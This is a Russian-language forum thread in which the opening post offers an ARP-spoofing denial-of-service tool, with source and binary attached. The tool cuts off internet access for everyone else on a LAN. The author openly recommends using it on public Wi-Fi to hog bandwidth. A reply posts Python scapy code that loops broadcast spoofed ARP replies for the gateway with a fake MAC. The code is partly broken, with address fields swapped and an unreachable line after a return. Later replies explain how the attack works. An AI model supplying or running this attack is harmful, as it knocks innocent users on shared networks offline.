Soft ARP-DOS | Отключение интернета у всех в LAN (кроме себя)

ARP DOS

Возникла у меня идея, а что если сделать ARP спуф, но при этом указать не существующий mac адрес в качестве носителя ip адреса шлюза? По идее тогда должен отрубиться интернет у тех, на кого направлен спуф.

Так я решил реализовать arp досер, который отключает интернет всем в локальной сети. Для себя я нашёл пользу в том, чтобы отключать в публичной wifi сети всех от интернета, тем самым получая подключение к интернету с не забитым другими людьми трафиком, а значит и более высокую скорость :]

У программы есть 1 минус, нельзя самому указать адаптер, так что надо делать так, чтобы программа запускалась когда адаптер подключенный к нужной сети использовался в качестве текущего основного подключения (и ещё, возможно, потребуется запускать с выключенным VPN, но его МОЖНО включить после начала доса)

Прога не сжирает процессор и сеть (отправляет всего 2 мелких пакета в секунду)

Запускается очень просто - sudo ./arpdos

В прикреплённом архиве исходный код и уже скомпилированный бинарник (arpdos)

P.S. К сожалению, я смог скомпилировать только для x64.
При компиляции на x86 мне выкидывает эту ошибку:
Код: 
# github.com/google/gopacket/pcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.so when searching for -lpcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.a when searching for -lpcap
/usr/bin/ld: cannot find -lpcap
collect2: error: ld returned 1 exit status
Я пытался её устранить, но всё тщетно. Может кто-то из вас сможет мне помочь? T-T
 

Вложения

  • Нравится
Реакции: Geniy47, Trema, BredBerry и ещё 10
Нажмите, чтобы раскрыть...
А, и да, забыл написать, я не стал пытаться допилить код для винды, поэтому эта программа только для линукса. Вотъ
 
1567887715637.png

у меня чтото не так?
 
Как всегда good!

notBrut0r сказал(а):
ARP DOS

Возникла у меня идея, а что если сделать ARP спуф, но при этом указать не существующий mac адрес в качестве носителя ip адреса шлюза? По идее тогда должен отрубиться интернет у тех, на кого направлен спуф.

Так я решил реализовать arp досер, который отключает интернет всем в локальной сети. Для себя я нашёл пользу в том, чтобы отключать в публичной wifi сети всех от интернета, тем самым получая подключение к интернету с не забитым другими людьми трафиком, а значит и более высокую скорость :]

У программы есть 1 минус, нельзя самому указать адаптер, так что надо делать так, чтобы программа запускалась когда адаптер подключенный к нужной сети использовался в качестве текущего основного подключения (и ещё, возможно, потребуется запускать с выключенным VPN, но его МОЖНО включить после начала доса)

Прога не сжирает процессор и сеть (отправляет всего 2 мелких пакета в секунду)

Запускается очень просто - sudo ./arpdos

В прикреплённом архиве исходный код и уже скомпилированный бинарник (arpdos)

P.S. К сожалению, я смог скомпилировать только для x64.
При компиляции на x86 мне выкидывает эту ошибку:
Код: 
# github.com/google/gopacket/pcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.so when searching for -lpcap
/usr/bin/ld: skipping incompatible //usr/lib/x86_64-linux-gnu/libpcap.a when searching for -lpcap
/usr/bin/ld: cannot find -lpcap
collect2: error: ld returned 1 exit status
Я пытался её устранить, но всё тщетно. Может кто-то из вас сможет мне помочь? T-T
Нажмите, чтобы раскрыть...
termux подерживает?
 
Очень понравилась идея автора, переписал на python
Работает через raw sockets (поэтому требует root'a)

Python: 
# -*- coding: utf-8 -*-

import scapy.all as scapy
import argparse
import socket
import time

def get_self_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    self_ip_global = s.getsockname()[0]
    return s.getsockname()[0]
    s.close()
  
def spoof():
    # target_mac = get_mac(target_ip)
    gateway = get_masc() + str(1)
    packet = scapy.ARP(op=2, psrc=gateway, hwsrc="f4:a3:af:11:12:44",
                       hwdst='0.0.0.0', pdst="ff:ff:ff:ff:ff:ff")
    scapy.send(packet, verbose=False)
  
def get_masc():
    self_ip = get_self_ip().split('.')
    self_ip = self_ip[0] + '.' + self_ip[1] + '.' + self_ip[2] + '.'

    return self_ip

id = 0
while True:
    spoof()
    print('Пакет ' + str(id))
    id = id + 1
    time.sleep(1)
 
  • Нравится
Реакции: nuv0t и bullik01
сейчас ситуация с вашей разработкой, пашет?
какой принцип работы (простыми словами) ?
 
arth сказал(а):
сейчас ситуация с вашей разработкой, пашет?
какой принцип работы (простыми словами) ?
Нажмите, чтобы раскрыть...
Почитайте что такое arp таблицы
Почитать что такое широковешатльные запросы
Все станет понятно

Отправляем широковешатльные arp request на изменение mac адреса gateway, все. Теперь все шлют запросы в пустоту, повторять каждые 5 секунд
 
Такой вопрос :
Через ПК я отрубаю всех от интернета
А потом подключиться с телефона могу ?
Или это возможно только с устройства , на котором я использую arp-dos???
 
spectra122 сказал(а):
Такой вопрос :
Через ПК я отрубаю всех от интернета
А потом подключиться с телефона могу ?
Или это возможно только с устройства , на котором я использую arp-dos???
Нажмите, чтобы раскрыть...

В ответе выше есть вся инфа, надо лишь немного подумать и погуглить про широковещательный адрес
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ